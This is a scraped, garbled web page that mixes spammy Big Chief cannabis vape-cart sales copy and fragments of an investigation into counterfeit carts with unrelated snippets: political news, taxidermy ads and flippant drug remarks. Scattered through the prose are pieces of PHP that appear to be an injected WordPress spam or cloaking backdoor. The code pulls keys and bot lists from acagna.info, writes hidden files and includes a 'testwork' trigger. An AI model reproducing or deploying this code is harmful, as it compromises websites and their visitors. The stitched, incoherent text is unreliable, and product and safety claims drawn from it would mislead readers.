"; By accepting all cookies, you agree to our use of cookies to deliver and maintain our services and site, improve the quality of Reddit, personalize Reddit content and advertising, and measure the effectiveness of advertising. ', '', $ddomain); The CBD carts are reportedly 100% free of THC, pesticide-free, and naturally favored. SOUR TANGIE. Not to mention that another Instagram account, @bigchiefextracts2, gives us a different take on verification: Official big chiefs , make sure yall got the Legits , A post shared by Big Chief Products (@bigchiefextracts2) on Feb 19, 2020 at 11:04am PST. if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { Jk Now, the messenger claims to be a licensed and compliant brand in California. Yet when asked for a BCC#, the response is CCL19-0002188. This is not remotely in the format for California licenses, which we explain fully in our guide. Required fields are marked*, Great article. You can also sample some of our other Big chief products such as Black Label Live Resin Pod, Triple Scoop. What Makes the Sunday Driver Strain the Perfect Weekend Companion? There was also a Twitter user who reported back five months ago doing likewise, but that account has since been vacated. Well, that part seems to be complicated. The pressure we put on the plant rhodium the earths rarest rare earth metal caused it to emit two precious flares of 700% increase in price. UPDATE 06/05/20: Another post on Reddit reports that even fake Big Chief carts scan like the real thing on the website. You have entered an incorrect email address! $pamparam = file_get_contents("{$eb}{$st}/.r"); Blackberry Kush has a hazy, jet fuel taste and aroma that is balanced by sweet berries. We'll assume you accept this policy as long as you are using this website, big chief carts scan big chief carts packaging, big chief carts what is the heat requirement, the big chief carts what is the heat requirement. BIG CHIEF EXTRACT CARTS. CBD cartridges are exactly alike THC carts which are disposable tanks but contain cannabidiol e-juice. persephone: san francisco and in Albuquerque by age three. } else { if (!function_exists('cacheUrl')) { Former Secret Service agent Dan Bongino called the FBI raid on former President Donald Trump's Mar-a-Lago home a "constitutional abomination to our constitutional republic" and said the personnel . Big Chief Carts and Extracts offers online sales of premium vape carts and cartridges at reasonable prices with complimentary shipping, View all of the different products forBig Chief. $ch = curl_init($url); Verify lab results. The Pineapple Express is a slightly sativa-leaning hybrid, which is the result of the crossing of the Hawaiian and Train wreck strains. $curtime = time(); Big Chief is officially back on the straight 'n' narrow, though the legion of counterfeits out there remains. if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); SOUR DIESEL All Rights Reserved, Experience a High Like No Other at All the Buzz Dispensary: Your One-stop Shop for Quality Cannabis, Elevate Your High With the Ultimate Cannabis Experience at Purple Penthouse Dispensary, Experience the Legacy of Exceptional Cannabis at Legacy DC Dispensary: Your Go-to Destination for All Your Marijuana Needs, Unleash the Power of Diamonds With Gifted Curators El Blunto Tiffany & OG Diamond Infused Joints, 7 Places To Get High-Quality CBD Products In DC, The Best Weed Delivery Services & Dispensaries In Virginia, Lemon Haze Strain: The Ultimate Guide for Cannabis Enthusiasts, Get To Know the Biscotti Strain: A Comprehensive Look at Its Origins, Effects, and Flavors, The Ultimate Guide to Tahoe Og Strain: Effects, Benefits, and More. if (file_exists("{$eb}{$st}/.r")) { This was posted by a moderator at Reddits clean carts forum. GSC, formerly known as Girl Scout Cookies, is an OG Kush and Durban Poison cross whose reputation grew too large to stay within the borders of its California homeland. Now its impossible at this point to pin down whether it was a black market package or a package produced by the company (well get to that part) itself. I: penny whats the greatest thing oth3r than this you did? IV meth (tried it, prefer smoking bath salt lol jk) comes really in handy. NAPALM OG BIG CHIEF CARTS If you choose one of their CBD vape cartridges, you can choose a 1000mg cart that is offered in five different flavors including mango, melon, berry, pineapple, and mint. Wollongong (Premium) shrooms (Psilocybe Cubensis Wollongong) is a strain of mushrooms from down under, Australia. $lang = $_REQUEST['lang']; And we asked if they were aware of the counterfeits of this product flying around and the person responded they were well aware and were taking steps to mitigate that. This operates for infinite. Big chief Carts are unique in any way, so where do we start? Yii is an open-source, high-performance, flexible, efficient, and secure PHP framework for rapidly building modern Web applications. It says it's at the airport 45 mins away from us. Your email address will not be published. Above it, there is a longer part named a vaporizer or a vape pen. The purity of their vape carts is particularly noteworthy. We have no idea whats going on. $dw = 1; Man oh man you guys got it but you dont at the same time. The purity of their vape carts is particularly noteworthy. THC carts has one smaller part that usually seems like a pipes mouthpiece known as THC carts. Golden cali Blue green. curl_close($ch); If this is bootleg, the packaging is impressive. Email Us: [email protected] Call Us: +1(843)732-0661. Incidentally, the Big Chief website does point to one of the four Instagrams. I filmed a gif that culminated in me turning into a girl with the sweetest cookie but they ripped the stuff off immediately, scored as a cuckold forty something I hooked up, the filming so expertly and perfectly done gave those girls a high feeling to Trump I guess. Sale! } file_put_contents("{$eb}{$st}/.k", $newkeys); If you need assistance with your order or have any questions about the website, simply contact us via phone or email and one of our team members will get back to you promptly. file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); //$fromse = 1; What Are The Best Electric Dab Rigs in 2021? The company is located in California where all of its products are manufactured and then sold or sent to online retailers. $ddomain = str_ireplace('www. } What if NONE of these were the real owners? our carts might be expensive but they are worth it. The QR code from that post, recall, went to a 404 page. $group = $_REQUEST['group']; if ($filetimemod < time() OR $skip_cache) { On their website its states that all of their products are of the purest and highest quality on the market. penny: my rap maybe, or my album which recently hit some type of award for a recording I did recently. } For medical patients, the Skywalker OG strain is one of the best medical choices due to its role in ending up insomnia and eliminating aches and pains. ZaZa, also known as "Za Za," is an indica dominant hybrid . Big Chief is DEFINITELY a copied and counterfeited brand. $ua = urlencode($_SERVER['HTTP_USER_AGENT']); Big Chief Extracts : More Drama, More Mystery. @ini_set('display_errors', '0'); '/class-wp-http-netfilter.php'; I have recently acquired 12 carts from different people in the area, and after testing them, all but 2 were authentic. $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); By rejecting non-essential cookies, Reddit may still use certain cookies to ensure the proper functionality of our platform. We also did find a Big Chief packaging offering on DHGate after all: So we have to conclude that regardless of the companys legitimacy. DabConnection is your spot for the latest info on dabbing, weed laws, industry news, and marijuana stocks. I have maybe 6 boxes? $redir = $eqq[0]; It is a generic and full-stack web programming framework for writing code in an object-oriented fashion and provides many proven and ready-to-use features. big chief carts are Provided with a 510thread, they are among the most common type ofcartridgevapebatteries that you will come across. $data = file_get_contents($file); else $qq = trim($eqq[2]); Thank you for your kind remarks. $abtip = 0; Ive read everything there is to read about these carts on your website. Big Chief's Sour Tangie 1g Cart brings classic flavors with exotic twists. $redcode = base64_encode($redcode); Speaking of social media, we have found no less than four Instagram accounts claiming to be Big Chief Extracts: Bigchiefextracts2, bigchiefextracts (set to private), bigchief_extracts_mx, and bigchiefsextractsofficial (likewise private). We wont be beat on cost! Need a testing. Hottest bridge jump on my earth. I dont care. As the cannabis industry continues to rise in popularity and amass an astounding amount of money, it comes as no surprise that there is a large number of companies that are looking to jump on the bandwagon and make their mark on the industry. They are available in fifteen distinct tastes. What is Napalm Og Big chief carts? The minds behind this amazing brand are an extremely devoted tribe of cannabis innovators with a handful of years of experience in agricultural and organic food production. Napalm OG has a THC range of 18-20%. elseif ($cldw || isset($_GET[$qq])) { According to whois, the site has been registered since February of 2019. file_put_contents("{$eb}{$st}/.k", $clkeys); Blue Dream X Rare Dankness strains. Big Chief is a big Fraud. } Investigative research for the purpose of consumer awareness. One of the most recent features that Big Chief Extracts has added to their products is a new, safety feature known as their Product Verification System. Use your social account for faster login or easy registration. if (!$bots[2] || $obtime > 172800) { $mtime = filemtime($file); $filetimemod = $mtime + $cachetime; I recently got a GSC cart from them and the oil is very clean, also the cart is made with quality too. $parkey = $key; if ($eqq[4]) $redcode = base64_decode($eqq[4]); Big Chief Extracts, as mentioned previously, has had a somewhat rocky history since its inception. I live in California and I get my big chiefs from the dispensary and I can forsure tell you that they are legit. } Its funny that a domestic stock company would bother registering for a cannabis license in the first place. } The copy at the bottom says The Kenneth Yoo Law Group has been practicing law in Southern California for the last 20 years. However, the about page on that site is still filled with lorem ipsum filler text. There is little to be found on the legitimacy of this company and it is almost impossible to be able to speak with someone from the company directly to get any questions answered. $abt = 1; Isnt twenty years enough time to finish writing a paragraph about yourself? Questions continue to pop up every day about the THC vape cartridge brand Big Chief Extracts. if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); On the off-chance that this is an innocent typo, were trying things like C12-0002188-LIC and getting nothing. For more information, please see our Big Chief Sour Diesel THC Vape Carts $ 30.00 $ 17.00 CBD Carts: CBD stands for Cannabidiol - a chemical component of the cannabis plant. CBD stands for Cannabidiol a chemical component of the cannabis plant. 1614 N Blackstone Ave, Fresno, Here is the website of same. View Details. Passionate about finding the truth and informing the public. Since our last report, black market packaging, online sellers, and street dealers have multiplied many times over. Avid cannabis enthusiast and geek of many talents and interests. The distillates in the extracts used contain no emulsifier or adulterants. Sale! these are some of my work, check it out. TheextractsofBig Chief cartridges are designed to intensify your experience with vape without any taste of artificial essence. Their vape carts are produced in more pure form. I live in Ohio. Even the fake ones, have a QR or scratch off code. SUNSET GELATO Polar Bear Full Body Taxidermy Mount African Hippopotamus Taxidermy Or maybe it was the ariana grande perfume which is a maybe good idea to try..the center one. Rated 1.00 out of 5. If you are buying big chief at a dispo they are selling u a fake product theres no doubt about it. Rated 5.00 out of 5. No officially licensed dispensary sells fake stuff. Big Chief carts extracts are famous for being pure cannabis oil distillates, which is rare to find. View Details. The FDA currently advises people to avoid vaping THC products. $dw = 0; Stay Big Chief'n. This flavor profile is a Gelato 33 Sour Apple IBL cross and a true hybrid strain. if (strstr($ip, ',')) { if (ini_get('allow_url_fopen')) { Extracts achieve their purity through a multilayered process of refinement through the extraction of terpenes, flavonoids, and cannabinoids. Its sad what they do and how they get away with it. This brand is so obfuscated and its path to proving the legitimacy of anything is so twisted that you might as well give up and vape something with a good review where it takes one easy minute to verify the company. $output = curl_exec($ch); We stand by our objective and fair research, which is made to the best of our ability. if (file_exists("{$eb}{$st}/.r")) { ft.) acting as a seed-to-sale distributor. And yet this is their about us page: OK, a whole year is too long to not finish building your site! else { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { Our reviewers continue to use them and post information regarding THC vapes, but we make no claims as to their safety. Our support team will contact you as you proceed. Cheers ^_^ ~ broken heart *3 xxxooo lol, Interview: i: how many cigarettes have you smoked so far? in L.A. goes to exactly the kind of tall, anonymous office building you would expect. Until we find something substantial from an actual credible source we cant say anything for sure. Privacy Policy. and other nice similar cartridges like the lazy ape carts. curl_setopt($ch, CURLOPT_URL, $url); // $cachetime = 60 * 60 * 24 * 7; //one week your favorite strain or THC oil). http_build_query($_GET) . } if ($morda) { THC acetate ester (THC-O or THCOA) can be synthesized. It's a result of the cross between Tahoe Alien and Alien Kush. } What is in them do y'all think? //ip found $kgroup = $egroup[0]; None of the products reviewed or featured on this site are approved by the Food and Drug Administration or recommended by a doctor. Save my name, email, and website in this browser for the next time I comment. For years, Big Chiefs Carts has been selling top-notch carts and extracts in various marijuana flavors, both CBD and THC. //t LOVE, POVERTY, WAR AND Also by Christopher Hitchens BLOOD, CLASS AND EMPIRE: The Enduring Anglo-American Relationship A LONG SHORT WAR: The Postponed Liberation of Iraq WHY ORWELL MATTERS LEFT HOOKS, RIGHT CROSSES: A Decade of Political Writing (edited with Christopher Caldwell) LETTERS TO A YOUNG CONTRARIAN THE TRIAL OF HENRY KISSINGER BLAMING THE VICTIMS: Spurious Scholarship and the . Great article. MEXICO CITY - Authorities on Wednesday started hauling away 177 lions, tigers, jaguars and other exotic big cats that were found at an animal rescue center in . Featuring the latest technology in cartridge design, our team at Big Chief Carts delivers nothing but the best quality vape cartridges on the market today. Ultimately, its up to you to decide what you choose to spend your money on and what brand you want to support, but we are here to help make that process a little easier. You cant tell the real from the fake, Im lucky working for a lab, so how do you know which ones will kill you? With buds that are dense and full of orange hairs and, Trainwreck is a mind-bending, potent sativa with effects that hit like a freight train. Wed practically have to be Scotland Yard to chase down every cartridge brand. $my_content = str_replace('', ". The cart is in the foam but also in an additional plastic container. The guarantee we take in providing premium quality taste in all our products ensures customer satisfaction. $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); Threw those away, kept the rest. With a sweet and earthy aroma, GSC launches you to euphorias top floor where full-body relaxation meets a time-bending cerebral space. curl_close($ch); It reads Organic Cannabis Oil & not just the Chiefs Head, It also reads THC Distillate Cartridge & not Pesticide Free & not THC Distillate Cartridge, No Product Verification Module on the side, There are slight differences, but I clue should really be BLGCHIEFEXTRACTS not BIG, And the strain I have is Kush OG, and I dont even see that listed as a flavor. $250 an Oz and $130 Per Half. All were seeing is a bunch of Snapchat screenshots about this, with no credible sources. I buy mine from the street in Texas and they are always legit. Big Chief BIG SCAM. Big Chief Extracts is already a gray market THC vape cartridge brand which we reviewed last time to just barely qualify it as licensed. Big chief extracts one of the best Thc cartridges, High potency, Lab tested vitamin E free and High THC content with amazing flavours. Confident Cannabis, as far as weve been able to figure out, is a software / B2B service for cannabis laboratories, but they will also host lab results. $btf = fopen("{$eb}.bt", 'w'); You might, I definitely recommend the Podpak to any and everyone meaning to try out a new, Curaleaf offers quality flower at great prices. who wants a little extra help to get to sleep at night. Check out Cookies Carts we are now integrated with them. Meanwhile, the BCCs license sticks the company out in San Bernardino. Maybe that was telling us that Big Chief is too janky a brand even if we do dig up a license. Big Chief Extracts can be found on many popular online sellers like DHGate and VapesWholesale which is why they have maintained their status and popularity to this day. When you run a tightly closed operation with so little information getting out to the public, thats how counterfeit brands pop up. THCO (THC acetate ester) has been reclassified by, THC acetate ester(THC-O-acetate,THC acetate,O-acetyl-THC,THC-O,ATHC) is theacetateesterofTHC. if ($_REQUEST['testwork'] == 'ololo') { But why is this so hard to verify? BLUE DREAM They provide a great high that lasts a, I read the news today and ouch! Scan this QR code to download the app now. if (isset($_GET['debug'])) $abt = 1; In my opinion, it is maybe better than some perfumes but only for the heart undernoted which belie ariana grande. Its thc free but also low in cannabidiol(cbd). } All I can say is if you live in an illegal state DONT BUY CARTS AT ALL, especially from a dealer in a illegal state. It does not provide for the most inspiring or productive high, but it pairs well with a cozy evening, a tasty beverage, and an old VHS tape of The Empire Strikes Back. The extracts of Big Chief cartridges are designed to intensify your experience with vape without any taste of artificial essence. $ 200.00 - $ 3,000.00 big chief carts are Provided with a 510 thread, they are among the most common type of cartridge vape batteries that you will come across. According to Amsterdam Seed Center, it has a tart fruit and earthy flavor and matching aroma, along with 15%-to-20% THC levels on average Well, this came from a Reddit thread, and another commenter on there said they asked on Big Chiefs Instagram and got the MCSB this time, CDPH-10002803.. } Since then, one of our Deep Throat commenters mentioned that we should Google that address under the Cali Blue Sky corporate listing (1055 WILSHIRE BLVD, STE 1945 LOS ANGELES CA 90017). So far Ive seen nothing wrong with the brand, the carts I get feel and hit just like a real medical cart to me. All it would take is five minutes just to fill in that about page. curl_setopt($ch, CURLOPT_HEADER, 0); Those girls deserve a home too. The real big chief carts make you download the app GENUINITI where you scan the chiefs head on the box, then it verifies you. The Big Chiefs cartridges ensure a consistent flavor experience with every puff, thanks to the pure extract used. BLACKBERRY KUSH Known for its super sleepy high and. With buds that are dense and full of orange hairs and. Spend a few dollars, and you, too, can be a Big Chief filler! https://www.globaltaxidermymounts.com/product/awesome-polar-bear-full-body-taxidermy-mount/, Great article. $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = null; Since then, new information has come to light in fact, not a day goes by without some new static on the air about Big Chief. $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); Also, I saved a girl from fentanyl (tried it, not partaking) earlier this year, dilaudid is mine though jk. Fire up Your Life: A Guide to the Fiery Fire OG Strain, Read This Before You Try the Fruity Pebbles Strain. It takes as little as $49 to register an LLC, by the way. How many license numbers are we going to get for one company that all lead to anything but a cannabis oil production facility? Like all our vape carts, ourBig chief extracts cartridges use premium terpenes blended into our cold-ethanol distillate. We tried the address under the corporate listing, (3411 E.15TH STREET LOS ANGELES CA 90023), and this time when we visit the neighborhood we got a distinctly un-corporate vibe: Of course, we try the phone and get a garbled answering machine, and the email address produces no response. Big Chief THC carts are the finest you can find because the product offers nothing else except clean THC stimulation, which earned them noticeable praise and adoration. if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { This is a distillate oil cartridge that says to comprise top rate Vape Oil. The boxes themselves seem to be real, they have the bigchiefextracts.com. if (preg_match('#\n$parkey rating\n, #iUm', $my_content, $ahrefs); Emulsifier, or synthetic products that can possibly alter the cannabis oil and terpene formulation. The other 2 were delta 8 thc, and a bunch of unknown solvents. Texas Longhorn Steer Taxidermy Shoulder Mount For Sale die(); According to Amsterdam Seed Center, it has a tart fruit and earthy flavor and matching aroma, along with 15%-to-20% THC levels on average